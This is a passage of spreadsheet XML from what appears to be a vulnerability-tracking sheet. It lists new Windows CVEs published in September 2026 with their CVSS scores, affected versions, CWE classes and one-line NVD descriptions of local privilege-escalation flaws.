      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K165" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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66" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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69" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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1" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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2" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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75" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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7" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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8" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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79" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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1" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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2" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
